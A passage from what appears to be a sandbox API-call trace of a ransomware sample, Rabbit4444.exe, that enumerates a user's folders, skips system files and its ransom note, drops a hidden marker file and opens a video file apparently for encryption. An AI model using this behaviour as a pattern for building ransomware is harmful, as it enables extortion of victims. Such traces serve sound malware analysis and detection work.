lpString2="Rabbit4444.exe") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2="bootmgr") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2="pagefile.sys") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2="boot") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2="ids.txt") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2="NTUSER.DAT") returned 1 [0048.204] lstrcpyW (in: lpString1=0x130eb58, lpString2="Recent" | out: lpString1="Recent") returned="Recent" [0048.204] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Recent", dwFileAttributes=0x2412) returned 1 [0048.204] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Recent\r\n") returned 41 [0048.205] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Recent\r\n") returned 41 [0048.205] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.205] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x802 [0048.205] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x29, lpOverlapped=0x0) returned 1 [0048.206] CloseHandle (hObject=0x278) returned 1 [0048.207] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0048.207] lstrcmpiW (lpString1="Saved Games", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.207] lstrcmpiW (lpString1="Saved Games", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2="Rabbit4444.exe") returned 1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2=".") returned 1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2="..") returned 1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2="windows") returned -1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2="bootmgr") returned 1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2="pagefile.sys") returned 1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2="boot") returned 1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2="ids.txt") returned 1 [0048.208] lstrcmpiW (lpString1="Saved Games", lpString2="NTUSER.DAT") returned 1 [0048.208] lstrcpyW (in: lpString1=0x130eb58, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0048.208] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Saved Games", dwFileAttributes=0x10) returned 1 [0048.208] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0048.208] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x38) returned 0x102510 [0048.208] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf63b0 [0048.208] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="Rabbit4444.exe") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2=".") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="..") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="windows") returned -1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="bootmgr") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="pagefile.sys") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="boot") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="ids.txt") returned 1 [0048.208] lstrcmpiW (lpString1="Searches", lpString2="NTUSER.DAT") returned 1 [0048.208] lstrcpyW (in: lpString1=0x130eb58, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0048.209] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches", dwFileAttributes=0x10) returned 1 [0048.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0048.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102590 [0048.209] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf6670 [0048.209] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="Rabbit4444.exe") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="windows") returned -1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="bootmgr") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="pagefile.sys") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="boot") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="ids.txt") returned 1 [0048.209] lstrcmpiW (lpString1="SendTo", lpString2="NTUSER.DAT") returned 1 [0048.209] lstrcpyW (in: lpString1=0x130eb58, lpString2="SendTo" | out: lpString1="SendTo") returned="SendTo" [0048.209] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\SendTo", dwFileAttributes=0x2412) returned 1 [0048.209] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\SendTo\r\n") returned 41 [0048.209] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\SendTo\r\n") returned 41 [0048.209] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.210] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x82b [0048.210] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x29, lpOverlapped=0x0) returned 1 [0048.211] CloseHandle (hObject=0x278) returned 1 [0048.212] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="Rabbit4444.exe") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="bootmgr") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="pagefile.sys") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="boot") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="ids.txt") returned 1 [0048.212] lstrcmpiW (lpString1="Start Menu", lpString2="NTUSER.DAT") returned 1 [0048.212] lstrcpyW (in: lpString1=0x130eb58, lpString2="Start Menu" | out: lpString1="Start Menu") returned="Start Menu" [0048.212] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Start Menu", dwFileAttributes=0x2412) returned 1 [0048.213] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Start Menu\r\n") returned 45 [0048.213] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Start Menu\r\n") returned 45 [0048.213] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.213] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x854 [0048.213] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x2d, lpOverlapped=0x0) returned 1 [0048.214] CloseHandle (hObject=0x278) returned 1 [0048.215] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="Rabbit4444.exe") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="bootmgr") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="pagefile.sys") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="boot") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="ids.txt") returned 1 [0048.215] lstrcmpiW (lpString1="Templates", lpString2="NTUSER.DAT") returned 1 [0048.216] lstrcpyW (in: lpString1=0x130eb58, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0048.216] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Templates", dwFileAttributes=0x2412) returned 1 [0048.216] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Templates\r\n") returned 44 [0048.216] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Templates\r\n") returned 44 [0048.216] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.216] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x881 [0048.216] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x2c, lpOverlapped=0x0) returned 1 [0048.218] CloseHandle (hObject=0x278) returned 1 [0048.219] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd48096a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xcd48096a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="Rabbit4444.exe") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0048.219] lstrcmpiW (lpString1="Videos", lpString2="NTUSER.DAT") returned 1 [0048.219] lstrcpyW (in: lpString1=0x130eb58, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0048.219] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos", dwFileAttributes=0x10) returned 1 [0048.219] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0048.219] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2e) returned 0xf75d8 [0048.219] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6450 [0048.219] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd48096a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xcd48096a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0048.219] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0048.219] lstrcpyW (in: lpString1=0x130eb58, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.220] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.220] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.221] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.221] CloseHandle (hObject=0x278) returned 1 [0048.221] CloseHandle (hObject=0x27c) returned 1 [0048.222] GetCurrentThreadId () returned 0xd98 [0048.222] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0048.222] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Videos", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0048.222] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf75d8 | out: hHeap=0xe0000) returned 1 [0048.222] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0048.222] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos" | out: lpString1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0048.222] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0048.222] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\.BFC0E91B00AE8A0620D3" [0048.222] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.223] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.225] FlushFileBuffers (hFile=0x27c) returned 1 [0048.226] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.226] CloseHandle (hObject=0x27c) returned 1 [0048.227] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos") returned 22 [0048.227] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.227] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd48096a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe61138e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0048.227] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.227] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.227] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.227] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.227] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd48096a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe61138e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.227] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.227] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.227] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.227] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.227] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.227] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe61138e8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe61138e8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe61138e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.227] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.228] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.228] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ea3880, ftCreationTime.dwHighDateTime=0x1d4cc3c, ftLastAccessTime.dwLowDateTime=0xfe228710, ftLastAccessTime.dwHighDateTime=0x1d4d37f, ftLastWriteTime.dwLowDateTime=0xfe228710, ftLastWriteTime.dwHighDateTime=0x1d4d37f, nFileSizeHigh=0x0, nFileSizeLow=0x88f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="54be.flv", cAlternateFileName="")) returned 1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="Rabbit4444.exe") returned -1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2=".") returned 1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="..") returned 1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="windows") returned -1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="bootmgr") returned -1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="pagefile.sys") returned -1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="boot") returned -1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="ids.txt") returned -1 [0048.228] lstrcmpiW (lpString1="54be.flv", lpString2="NTUSER.DAT") returned -1 [0048.228] lstrcpyW (in: lpString1=0x130eb66, lpString2="54be.flv" | out: lpString1="54be.flv") returned="54be.flv" [0048.228] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\54be.flv", dwFileAttributes=0x0) returned 1 [0048.228] lstrlenW (lpString="54be.flv") returned 8 [0048.228] lstrlenW (lpString="Rabbit4444") returned 10 [0048.228] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0048.228] lstrlenW (lpString=".dll") returned 4 [0048.228] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0048.228] lstrlenW (lpString=".lnk") returned 4 [0048.228] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0048.228] lstrlenW (lpString=".ini") returned 4 [0048.228] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0048.228] lstrlenW (lpString=".sys") returned 4 [0048.228] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0048.228] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\54be.flv" (normalized: "c:\\users\\fd1hvy\\videos\\54be.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.229] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.229] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13953934315) returned 1 [0048.229] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=35063) returned 1 [0048.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0048.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0048.229] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8c00, lpName=0x0) returned 0x298 [0048.229] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8c00) returned 0x70000 [0048.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.230] QueryPerformanceCounter (in: 